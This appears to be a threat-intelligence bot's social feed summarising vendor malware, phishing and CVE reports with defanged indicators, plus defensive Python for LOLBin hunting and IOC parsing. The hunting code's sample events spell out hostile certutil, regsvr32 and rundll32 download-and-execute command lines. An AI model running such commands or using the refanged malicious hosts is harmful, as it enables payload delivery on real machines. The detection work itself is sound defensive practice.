piggo
@pigondrugs.bsky.social
📤 30
📥 6
📝 741
I shear alpacas and try to defend the internet from malware
~Cofense~ Threat actors exploit the high email volume and shopper urgency of the holiday season for widespread phishing campaigns. - IOCs: (None identified) -
#BlackFriday
#Phishing
#ThreatIntel
Black Friday Phishing Peaks
https://cofense.com/blog/behind-the-bargains-why-phishing-peaks-on-black-friday
about 1 hour ago
~Anyrun~ November's landscape was dominated by multi-stage loaders like XWorm and JSGuLdr delivering stealers and backdoors via in-memory execution. - IOCs: drive. google. com -
#JSGuLdr
#Malware
#ThreatIntel
#XWorm
November 2025 Threat Roundup: XWorm & JSGuLdr
https://any.run/cybersecurity-blog/major-cyber-attacks-november-2025/
about 5 hours ago
~Zscaler~ Water Gamayun APT exploits CVE-2025-26633 via lookalike domains to deliver multi-stage PowerShell payloads. - IOCs: belaysolutions[. ]link, 103. 246. 147. 17 -
#CVE202526633
#ThreatIntel
#WaterGamayun
Water Gamayun APT Exploits MSC EvilTwin
https://www.zscaler.com/blogs/security-research/water-gamayun-apt-attack
about 22 hours ago
~Socket~ Numerous NPM packages compromised via account takeover to steal credentials from CI/CD environments and self-propagate. - IOCs: (None identified) -
#Malware
#NPM
#SupplyChain
#ThreatIntel
Shai Hulud NPM Supply Chain Attack
https://socket.dev/blog/shai-hulud-strikes-again-v2
about 22 hours ago
~Cisa~ CISA released seven new advisories detailing security issues and vulnerabilities in various Industrial Control Systems products. - IOCs: (None identified) -
#CISA
#ICS
#ThreatIntel
#Vulnerability
CISA Releases 7 ICS Advisories
https://www.cisa.gov/news-events/alerts/2025/11/25/cisa-releases-seven-industrial-control-systems-advisories
about 22 hours ago
~Sentinelone~ SentinelOne released an open-source Synapse power-up for Validin to enhance threat infrastructure discovery and pivoting. - IOCs: (None identified) -
#Synapse
#ThreatHunting
#ThreatIntel
Threat Hunting with Validin and Synapse
https://www.sentinelone.com/labs/threat-hunting-power-up-enhance-campaign-discovery-with-validin-and-synapse/
1 day ago
~Paloalto~ Malicious LLMs like WormGPT & KawaiiGPT are lowering the cybercrime barrier by automating malware & phishing creation. - IOCs: fakebankverify[. ]com -
#AI
#Malware
#ThreatIntel
Malicious LLMs Lower Cybercrime Barrier
https://unit42.paloaltonetworks.com/dilemma-of-ai-malicious-llms/
1 day ago
~Cisa~ Threat actors are using commercial spyware and social engineering to compromise mobile messaging apps like Signal and WhatsApp. - IOCs: (None identified) -
#MobileSecurity
#Spyware
#ThreatIntel
Spyware Targets Messaging App Users
https://www.cisa.gov/news-events/alerts/2025/11/24/spyware-allows-cyber-threat-actors-target-users-messaging-applications
2 days ago
~Morphisec~ Russian-linked actors distribute StealC V2 infostealer via malicious .blend files on 3D model sharing sites. - IOCs: 178. 16. 53. 64, 104. 245. 241. 157, 178. 16. 54. 69 -
#Blender
#StealC
#ThreatIntel
StealC V2 Targets Blender Users
https://www.morphisec.com/blog/morphisec-thwarts-russian-linked-stealc-v2-campaign-targeting-blender-users-via-malicious-blend-files/
2 days ago
~Socket~ Socket now offers real-time webhook events for security alert changes, enabling automated workflows and faster response. - IOCs: (None identified) -
#DevSecOps
#SupplyChain
#ThreatIntel
Socket Adds Webhook Events for Alert Changes
https://socket.dev/blog/introducing-webhook-events-for-alert-changes
2 days ago
~Socket~ ENISA is now a top-level CVE Root, centralizing vulnerability management and reporting for the entire European Union. - IOCs: (None identified) -
#CVE
#ENISA
#EU
#ThreatIntel
ENISA Becomes a CVE Root
https://socket.dev/blog/enisa-becomes-a-cve-root
5 days ago
~Cisa~ CISA added an actively exploited Oracle Fusion Middleware authentication vulnerability (CVE-2025-61757) to its KEV catalog. - IOCs: CVE-2025-61757 -
#CVE202561757
#Oracle
#ThreatIntel
CISA Adds Oracle Fusion Middleware Vuln to KEV
https://www.cisa.gov/news-events/alerts/2025/11/21/cisa-adds-one-known-exploited-vulnerability-catalog
5 days ago
~Socket~ Socket now scans OpenVSX extensions for malicious behavior, backdoors, and credential theft to secure the developer supply chain. - IOCs: piiithon-linter extension -
#OpenVSX
#SupplyChain
#ThreatIntel
#VSCode
Socket Scans OpenVSX Extensions for Threats
https://socket.dev/blog/introducing-socket-scanning-for-openvsx-extensions
5 days ago
~Sophos~ A malware campaign targets WhatsApp users with ZIP files to deploy the Astaroth (Guildma) banking trojan. - IOCs: manoelimoveiscaioba. com, varegjopeaks. com, docsmoonstudioclayworks. online -
#Astaroth
#Malware
#ThreatIntel
#WhatsApp
WhatsApp Campaign Deploys Astaroth Trojan
https://news.sophos.com/en-us/2025/11/20/whatsapp-compromise-leads-to-astaroth-deployment/
6 days ago
~Cisa~ CISA has released six new advisories detailing security issues and vulnerabilities in various Industrial Control Systems (ICS) products. - IOCs: (None identified) -
#CISA
#ICS
#ThreatIntel
#Vulnerability
CISA Releases Six ICS Advisories
https://www.cisa.gov/news-events/alerts/2025/11/20/cisa-releases-six-industrial-control-systems-advisories
6 days ago
~Zscaler~ A critical RCE (CVSS 9.8) in the Windows Graphics Component is exploitable via a malicious JPEG image. - IOCs: CVE-2025-50165 -
#CVE202550165
#ThreatIntel
#Windows
CVE-2025-50165: Windows Graphics RCE
https://www.zscaler.com/blogs/security-research/cve-2025-50165-critical-flaw-windows-graphics-component
6 days ago
~Socket~ Socket now provides supply chain security and SBOM generation for projects using the Bun and vlt JavaScript package managers. - IOCs: (None identified) -
#DevSecOps
#JavaScript
#SupplyChain
#ThreatIntel
Socket Adds Bun & vlt Support
https://socket.dev/blog/announcing-bun-and-vlt-support
6 days ago
~Mandiant~ APT24 targets Taiwanese orgs with BADAUDIO malware via supply chain attacks, strategic web compromises, and phishing. - IOCs: clients. brendns. workers. dev, wispy. geneva. workers. dev, www. cundis. com -
#APT24
#BADAUDIO
#ThreatIntel
APT24 Pivots to Multi-Vector Attacks
https://cloud.google.com/blog/topics/threat-intelligence/apt24-pivot-to-multi-vector-attacks/
6 days ago
~Trendmicro~ Trend Micro now offers one-click managed IPS rule groups natively within AWS Network Firewall. - IOCs: (None identified) -
#AWS
#CloudSecurity
#IPS
#ThreatIntel
Trend & AWS Partner on Cloud IPS
https://www.trendmicro.com/en_us/research/25/k/cloud-ips-one-click-protection.html
7 days ago
~Cisa~ CISA added the actively exploited Google Chromium V8 vulnerability (CVE-2025-13223) to its KEV catalog, requiring federal agencies to patch. - IOCs: CVE-2025-13223 -
#CISA
#CVE202513223
#ThreatIntel
CISA Adds CVE-2025-13223 to KEV Catalog
https://www.cisa.gov/news-events/alerts/2025/11/19/cisa-adds-one-known-exploited-vulnerability-catalog
7 days ago
~Varonis~ Cybercrime is shifting to a subscription-based 'as-a-service' model, lowering the barrier for attackers to access advanced tools and services. - IOCs: (None identified) -
#CaaS
#Cybercrime
#ThreatIntel
The Rise of Cybercrime Subscription Models
https://www.varonis.com/blog/cybercrime-subscription-business
7 days ago
~Socket~ Socket introduces Certified Patches to fix vulnerable dependencies in-place without requiring risky package upgrades. - IOCs: (None identified) -
#Patching
#SupplyChain
#ThreatIntel
#Vulnerability
Socket Certified Patches for Vulnerable Dependencies
https://socket.dev/blog/certified-patches
7 days ago
~Cofense~ Threat actors are abusing legitimate URL shorteners like t.ly, tinyurl.com, and goo.su to bypass security and deliver malware and phishing campaigns. - IOCs: t. ly, tinyurl. com, goo. su -
#Malware
#Phishing
#ThreatIntel
Threat Actors Abusing URL Shorteners
https://cofense.com/blog/the-6-url-shorteners-you-didn-t-know-were-helping-hackers
7 days ago
~Cisa~ CISA released a guide for ISPs and network defenders to mitigate risks from malicious Bulletproof Hosting (BPH) providers. - IOCs: (None identified) -
#BPH
#CISA
#ThreatIntel
CISA Guide to Mitigate Bulletproof Hosting
https://www.cisa.gov/news-events/alerts/2025/11/19/cisa-releases-guide-mitigate-risks-bulletproof-hosting-providers
7 days ago
~Eset~ PlushDaemon deploys the EdgeStepper network implant to hijack software updates via adversary-in-the-middle attacks. - IOCs: 8. 212. 132. 120, 47. 242. 198. 250, ds20221202. dsc. wcsset. com -
#EdgeStepper
#PlushDaemon
#ThreatIntel
PlushDaemon's EdgeStepper Implant
https://www.welivesecurity.com/en/eset-research/plushdaemon-compromises-network-devices-for-adversary-in-the-middle-attacks/
7 days ago
~Anyrun~ Threat actors abuse legitimate Windows binaries (e.g., rundll32, certutil) to execute malicious code and evade detection. - IOCs: (None identified) -
#DefenseEvasion
#LOLBin
#ThreatIntel
LOLBin Attacks Explained
https://any.run/cybersecurity-blog/lolbin-attacks-soc-detection-guide/
7 days ago
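The Any.Run post above states the technique in one sentence. As an added example (my code, not Any.Run's guide and not the bot's), this is the shape of a command-line hunt a SOC would run over process-creation telemetry for exactly those binaries. The key=value event format, the rule names, the `parse_event`/`hunt` helpers and the sample events are all constructed for this example; the argument patterns they key on (certutil `-urlcache` and `-decode`, rundll32 with an inline `javascript:` or `url.dll,OpenURL`, regsvr32 `/i:http...` with `scrobj.dll`, mshta with a remote URL) are the documented abuse signatures of those binaries, and 198.51.100.0/24 is a documentation-only address range.

```python
import re

# Hunting rules over process command lines. Each pattern keys on the argument a
# benign use of the binary does not need, so "certutil -verify" or
# "rundll32 shell32.dll,Control_RunDLL" stay quiet.
LOLBIN_RULES = [
    ("certutil_remote_fetch",
     re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*\bhttps?://", re.I)),
    ("certutil_base64_decode",
     re.compile(r"\bcertutil(?:\.exe)?\b.*-decode\b", re.I)),
    ("rundll32_inline_script",
     re.compile(r"\brundll32(?:\.exe)?\b.*\b(?:javascript|vbscript):", re.I)),
    ("rundll32_url_dll",
     re.compile(r"\brundll32(?:\.exe)?\b.*\burl\.dll\s*,\s*(?:OpenURL|FileProtocolHandler)\b", re.I)),
    ("mshta_remote",
     re.compile(r"\bmshta(?:\.exe)?\b.*\bhttps?://", re.I)),
    ("regsvr32_scriptlet",
     re.compile(r"\bregsvr32(?:\.exe)?\b.*/i:https?://.*\bscrobj\.dll\b", re.I)),
]

# Field extractors for the constructed key=value event format used below.
CMDLINE = re.compile(r'CommandLine="([^"]*)"')
PARENT = re.compile(r"ParentImage=(\S+)")


def parse_event(line: str):
    """Return (parent_image, command_line), or None if the line has no CommandLine."""
    m = CMDLINE.search(line)
    if not m:
        return None
    p = PARENT.search(line)
    return (p.group(1) if p else "", m.group(1))


def hunt(events) -> list:
    """Return [(rule_name, parent_image, command_line)] for every matching event.

    A single command line can trip several rules; each match is reported once.
    """
    hits = []
    for line in events:
        parsed = parse_event(line)
        if parsed is None:
            continue
        parent, cmd = parsed
        for name, pattern in LOLBIN_RULES:
            if pattern.search(cmd):
                hits.append((name, parent, cmd))
    return hits


# Constructed process-creation events, not real telemetry. The first four lines
# are a download -> decode -> execute chain spawned from an Office process; the
# last two are legitimate uses of the same binaries and must not alert.
SAMPLE_EVENTS = [
    r'EventID=1 User=CORP\jdoe ParentImage=WINWORD.EXE CommandLine="certutil.exe -urlcache -split -f http://198.51.100.7/update.txt C:\Users\Public\u.txt"',
    r'EventID=1 User=CORP\jdoe ParentImage=WINWORD.EXE CommandLine="certutil -decode C:\Users\Public\u.txt C:\Users\Public\u.exe"',
    r'EventID=1 User=CORP\jdoe ParentImage=WINWORD.EXE CommandLine="rundll32.exe javascript:\..\mshtml,RunHTMLApplication ;document.write()"',
    r'EventID=1 User=CORP\jdoe ParentImage=WINWORD.EXE CommandLine="regsvr32 /s /n /u /i:http://198.51.100.7/f.sct scrobj.dll"',
    r'EventID=1 User=SYSTEM ParentImage=services.exe CommandLine="rundll32.exe shell32.dll,Control_RunDLL hotplug.dll"',
    r'EventID=1 User=CORP\jdoe ParentImage=explorer.exe CommandLine="certutil -verify C:\temp\vendor.cer"',
]

if __name__ == "__main__":
    for rule, parent, cmd in hunt(SAMPLE_EVENTS):
        print(f"{rule:24} parent={parent:12} {cmd}")
```

In production the same `hunt` runs over Sysmon Event ID 1 or Windows 4688 command lines; the parent image is carried through because an Office or browser parent spawning certutil or rundll32 is the triage signal that separates these hits from an administrator's interactive use.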
~Cisa~ CISA adds actively exploited Fortinet FortiWeb OS command injection vulnerability (CVE-2025-58034) to its KEV catalog. - IOCs: CVE-2025-58034 -
#CVE202558034
#Fortinet
#ThreatIntel
CISA Adds Fortinet Vuln to KEV Catalog
https://www.cisa.gov/news-events/alerts/2025/11/18/cisa-adds-one-known-exploited-vulnerability-catalog
8 days ago
~Socket~ Socket has released a beta for its function-level vulnerability reachability analysis tool for Ruby to help developers prioritize exploitable CVEs. - IOCs: (None identified) -
#DevSecOps
#Ruby
#ThreatIntel
#VulnerabilityManagement
Ruby Vulnerability Reachability Analysis in Beta
https://socket.dev/blog/reachability-for-ruby-now-in-beta
8 days ago
~Cisa~ CISA released six new advisories detailing vulnerabilities in various Industrial Control Systems (ICS) products. - IOCs: (None identified) -
#CISA
#ICS
#ThreatIntel
#Vulnerability
CISA Releases Six ICS Advisories
https://www.cisa.gov/news-events/alerts/2025/11/18/cisa-releases-six-industrial-control-systems-advisories
8 days ago
~Morphisec~ New Tuoni C2 campaign uses an AI-assisted loader with steganography to deliver stealthy in-memory payloads. - IOCs: 206. 81. 10. 0, kupaoquan. com, udefined30. domainofhonour40. xyz -
#Malware
#ThreatIntel
#TuoniC2
Tuoni C2 Attack Uses AI-Assisted Loader
https://www.morphisec.com/blog/morphisec-thwarts-sophisticated-tuoni-c2-attack-on-us-real-estate-firm/
8 days ago
~Trendmicro~ Ransomware is evolving to target AWS S3 buckets by exploiting misconfigurations and native features like SSE-C to encrypt or delete data. - IOCs: (None identified) -
#AWS
#Ransomware
#S3
#ThreatIntel
S3 Ransomware Variants & Defenses
https://www.trendmicro.com/en_us/research/25/k/s3-ransomware.html
8 days ago
~Socket~ Massive spam campaign floods npm to abuse the TEA Protocol crypto scheme; it is not a worm and poses no direct security threat. - IOCs: tea. xyz -
#Spam
#ThreatIntel
#npm
TEA Protocol Spam Floods npm
https://socket.dev/blog/tea-protocol-spam-floods-npm-but-its-not-a-worm
9 days ago
~Socket~ Malicious npm packages use Adspect cloaking to fingerprint users and redirect victims to malicious sites while evading researchers. - IOCs: association-google. xyz, appprotector. online, protectorapp. online -
#Malware
#ThreatIntel
#npm
npm Malware Uses Adspect Cloaking for Malicious Redirects
https://socket.dev/blog/npm-malware-campaign-uses-adspect-cloaking-to-deliver-malicious-redirects
9 days ago
~Sentinelone~ New LLM-enabled malware generates code at runtime but can be detected by hunting for hardcoded API keys and prompts. - IOCs: PromptLock, PROMPTSTEAL, MalTerminal -
#AI
#Malware
#ThreatIntel
LLM-Enabled Malware In the Wild
https://www.sentinelone.com/labs/labscon25-replay-llm-enabled-malware-in-the-wild/
9 days ago
~Mandiant~ Iran-nexus actor UNC1549 targets aerospace & defense via third-party compromise, phishing, and custom malware for espionage. - IOCs: 104. 194. 215. 88, 13. 60. 50. 172, 167. 172. 137. 208 -
#Espionage
#ThreatIntel
#UNC1549
UNC1549 Targets Aerospace & Defense with Custom Malware
https://cloud.google.com/blog/topics/threat-intelligence/analysis-of-unc1549-ttps-targeting-aerospace-defense/
9 days ago
~Socket~ PyPI has expanded its tokenless Trusted Publishing feature to support GitLab Self-Managed instances, enhancing software supply chain security. - IOCs: (None identified) -
#GitLab
#PyPI
#SupplyChainSecurity
#ThreatIntel
PyPI Expands Trusted Publishing to GitLab Self-Managed
https://socket.dev/blog/pypi-expands-trusted-publishing-to-gitlab-self-managed
12 days ago
~Paloalto~ Large-scale campaigns impersonate popular software to deliver Gh0st RAT to Chinese-speaking users using increasingly evasive TTPs. - IOCs: 156. 251. 25. 112, 103. 181. 134. 138, 95. 173. 197. 195 -
#Gh0stRAT
#Malware
#ThreatIntel
Evolving Impersonation Campaigns Distribute Gh0st RAT
https://unit42.paloaltonetworks.com/impersonation-campaigns-deliver-gh0st-rat/
12 days ago
~Cisa~ Unauthenticated path traversal vulnerability CVE-2025-64446 in FortiWeb is actively exploited, allowing remote administrative command execution. - IOCs: CVE-2025-64446 -
#CVE202564446
#Fortinet
#ThreatIntel
Fortinet FortiWeb Path Traversal Vulnerability
https://www.cisa.gov/news-events/alerts/2025/11/14/fortinet-releases-security-advisory-relative-path-traversal-vulnerability-affecting-fortiweb
12 days ago
~Trendmicro~ Threat actors are leveraging agentic AI to automate and scale sophisticated attacks, requiring enterprises to adopt AI-driven defenses. - IOCs: (None identified) -
#AI
#Cybercrime
#ThreatIntel
Defense Against AI-Led Cyberattacks
https://www.trendmicro.com/en_us/research/25/k/redefining-defense-in-era-of-ai-led-attacks.html
12 days ago
~Cisa~ CISA warns of active exploitation of a Fortinet FortiWeb path traversal vulnerability (CVE-2025-64446) by adding it to the KEV catalog. - IOCs: CVE-2025-64446 -
#CVE202564446
#Fortinet
#ThreatIntel
CISA Adds Fortinet FortiWeb Vuln to KEV Catalog
https://www.cisa.gov/news-events/alerts/2025/11/14/cisa-adds-one-known-exploited-vulnerability-catalog
12 days ago
~Socket~ The 'Safery: Ethereum Wallet' Chrome extension exfiltrates crypto seed phrases via Sui blockchain transactions. - IOCs: kifagusertyna@gmail[. ]com, fibemlnkopkeenmmgcfohhcdbkhgbolo -
#Crypto
#Malware
#ThreatIntel
Malicious Chrome Wallet Steals Seed Phrases
https://socket.dev/blog/malicious-chrome-extension-exfiltrates-seed-phrases
12 days ago
~Elastic~ DragonBreath APT uses new multi-stage loader RONINGLOADER to disable security tools via PPL abuse and deploy a gh0st RAT variant. - IOCs: qaqkongtiao. com -
#DragonBreath
#RoningLoader
#ThreatIntel
DragonBreath APT Deploys RONINGLOADER
https://www.elastic.co/security-labs/roningloader
13 days ago
~Cisa~ CISA released 18 new advisories detailing security issues and vulnerabilities in various Industrial Control Systems. - IOCs: (None identified) -
#ICS
#ThreatIntel
#Vulnerability
CISA Releases 18 ICS Advisories
https://www.cisa.gov/news-events/alerts/2025/11/13/cisa-releases-18-industrial-control-systems-advisories
13 days ago
~Mandiant~ Learn to use Time Travel Debugging (TTD) to analyze obfuscated .NET malware and extract an AgentTesla payload. - IOCs: 4dfe67a8f1751ce0c29f7f44295e6028ad83bb8b3a7e85f84d6e251a0d7e3076 -
#MalwareAnalysis
#TTD
#ThreatIntel
TTD for .NET Malware Analysis
https://cloud.google.com/blog/topics/threat-intelligence/time-travel-debugging-using-net-process-hollowing/
13 days ago
~Cisa~ CISA and partners updated the Akira ransomware advisory with new TTPs, including the use of POORTRY and STONETOP malware. - IOCs: POORTRY, STONETOP, SystemBC -
#Akira
#Ransomware
#ThreatIntel
CISA Updates Akira Ransomware Advisory
https://www.cisa.gov/news-events/alerts/2025/11/13/cisa-and-partners-release-advisory-update-akira-ransomware
13 days ago
~Checkpoint~ Q3 2025 saw record ransomware group fragmentation, with Qilin leading attacks and LockBit re-emerging with version 5.0. - IOCs: (None identified) -
#LockBit
#Qilin
#Ransomware
#ThreatIntel
Q3 2025 Ransomware: Fragmentation & LockBit's Return
https://research.checkpoint.com/2025/the-state-of-ransomware-q3-2025/
13 days ago
~Trendmicro~ Lumma Stealer malware has resurged, adding browser fingerprinting to its C2 tactics for improved evasion and targeting. - IOCs: pabuloa. asia, jamelik. asia -
#InfoStealer
#LummaStealer
#ThreatIntel
Lumma Stealer Adds Browser Fingerprinting
https://www.trendmicro.com/en_us/research/25/k/lumma-stealer-browser-fingerprinting.html
13 days ago
~Sophos~ Microsoft's Nov. Patch Tuesday addresses 63 vulns, including 4 critical and one actively exploited Windows Kernel flaw (CVE-2025-62215). - IOCs: CVE-2025-62215 -
#CVE202562215
#Microsoft
#PatchTuesday
#ThreatIntel
Microsoft November 2025 Patch Tuesday
https://news.sophos.com/en-us/2025/11/12/november-patch-tuesday-does-its-chores/
14 days ago
~Socket~ The Socket team will be at Black Hat Europe and BSides London in December to discuss software supply chain security. - IOCs: (None identified) -
#BSides
#BlackHat
#SupplyChain
#ThreatIntel
Socket at Black Hat/BSides London
https://socket.dev/blog/meet-socket-at-black-hat-europe-and-bsides-london-2025
14 days ago
~Cisa~ CISA released guidance for Emergency Directive 25-03, mandating immediate patching for critical Cisco ASA & Firepower vulnerabilities. - IOCs: CVE-2025-20333, CVE-2025-20362 -
#CVE202520333
#Cisco
#ThreatIntel
CISA Guidance: Cisco ASA/FTD Vulns
https://www.cisa.gov/news-events/alerts/2025/11/12/update-implementation-guidance-emergency-directive-cisco-asa-and-firepower-device-vulnerabilities
14 days ago
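Every summary in this feed ends with a "- IOCs: ... -" field whose values are defanged either with spaces ("178. 16. 53. 64") or with "[. ]" ("belaysolutions[. ]link"), or carry "(None identified)". As an added example (my code, not the bot's and not any vendor's), the Python below parses that field out of a post, refangs the values for lookups, classifies each one by shape (IPv4, CVE, SHA-256, e-mail, domain, Chrome extension ID, or "other" for malware family names) and builds a deduplicated inventory across many posts. The sample posts are copied verbatim from the feed above; the function names and the classification labels are mine. Refanged values are meant for blocklists and log searches only, never for opening in a browser.

```python
import re

# Trailing IOC field the feed appends to every summary line, e.g.
#   "... - IOCs: belaysolutions[. ]link, 103. 246. 147. 17 -"
#   "... - IOCs: (None identified) -"
IOC_FIELD = re.compile(r"-\s*IOCs:\s*(.*?)\s*-\s*$")

# Indicator shapes seen in this feed. A Chrome extension ID is 32 chars from a-p.
IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
CVE = re.compile(r"^CVE-\d{4}-\d{4,}$", re.IGNORECASE)
SHA256 = re.compile(r"^[0-9a-fA-F]{64}$")
EMAIL = re.compile(r"^[^@\s]+@(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,}$")
DOMAIN = re.compile(r"^(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,}$")
CHROME_EXT_ID = re.compile(r"^[a-p]{32}$")


def refang(token: str) -> str:
    """Undo the feed's defanging: '[. ]', '[.]' and '. ' all stand for '.'."""
    t = token.strip()
    t = re.sub(r"\[\s*\.\s*\]", ".", t)
    t = re.sub(r"\.\s+", ".", t)
    return t


def classify(value: str) -> str:
    """Name the indicator type, or 'other' for names such as malware families."""
    if IPV4.match(value):
        octets = [int(o) for o in value.split(".")]
        return "ipv4" if all(o <= 255 for o in octets) else "other"
    if CVE.match(value):
        return "cve"
    if SHA256.match(value):
        return "sha256"
    if CHROME_EXT_ID.match(value):
        return "chrome_ext_id"
    if EMAIL.match(value):
        return "email"
    if DOMAIN.match(value):
        return "domain"
    return "other"


def extract_iocs(post: str) -> list:
    """Return [(type, refanged_value), ...] for one feed post, [] when it has none."""
    m = IOC_FIELD.search(post)
    if not m:
        return []
    body = m.group(1).strip()
    if not body or body.lower().startswith("(none"):
        return []
    found = []
    for part in body.split(","):
        value = refang(part)
        if value:
            found.append((classify(value), value))
    return found


def inventory(posts) -> dict:
    """Group refanged indicators by type across many posts, deduplicated."""
    by_type = {}
    for post in posts:
        for kind, value in extract_iocs(post):
            by_type.setdefault(kind, set()).add(value)
    return by_type


# Summary lines copied verbatim from the feed above; the defanging is the feed's own.
SAMPLE_POSTS = [
    "~Cofense~ Threat actors exploit the high email volume and shopper urgency of the holiday season for widespread phishing campaigns. - IOCs: (None identified) -",
    "~Zscaler~ Water Gamayun APT exploits CVE-2025-26633 via lookalike domains to deliver multi-stage PowerShell payloads. - IOCs: belaysolutions[. ]link, 103. 246. 147. 17 -",
    "~Morphisec~ Russian-linked actors distribute StealC V2 infostealer via malicious .blend files on 3D model sharing sites. - IOCs: 178. 16. 53. 64, 104. 245. 241. 157, 178. 16. 54. 69 -",
    "~Socket~ The 'Safery: Ethereum Wallet' Chrome extension exfiltrates crypto seed phrases via Sui blockchain transactions. - IOCs: kifagusertyna@gmail[. ]com, fibemlnkopkeenmmgcfohhcdbkhgbolo -",
    "~Mandiant~ Learn to use Time Travel Debugging (TTD) to analyze obfuscated .NET malware and extract an AgentTesla payload. - IOCs: 4dfe67a8f1751ce0c29f7f44295e6028ad83bb8b3a7e85f84d6e251a0d7e3076 -",
    "~Cisa~ CISA released guidance for Emergency Directive 25-03, mandating immediate patching for critical Cisco ASA & Firepower vulnerabilities. - IOCs: CVE-2025-20333, CVE-2025-20362 -",
]

if __name__ == "__main__":
    for kind, values in sorted(inventory(SAMPLE_POSTS).items()):
        print(kind, sorted(values))
```

The octet range check matters because the feed's space-defanged IPs look like any other dotted string once refanged; without it a mangled value would land in a blocklist as an address. The "other" bucket is where family names such as POORTRY or PromptLock end up, which is the right outcome: they are search terms, not machine-matchable indicators.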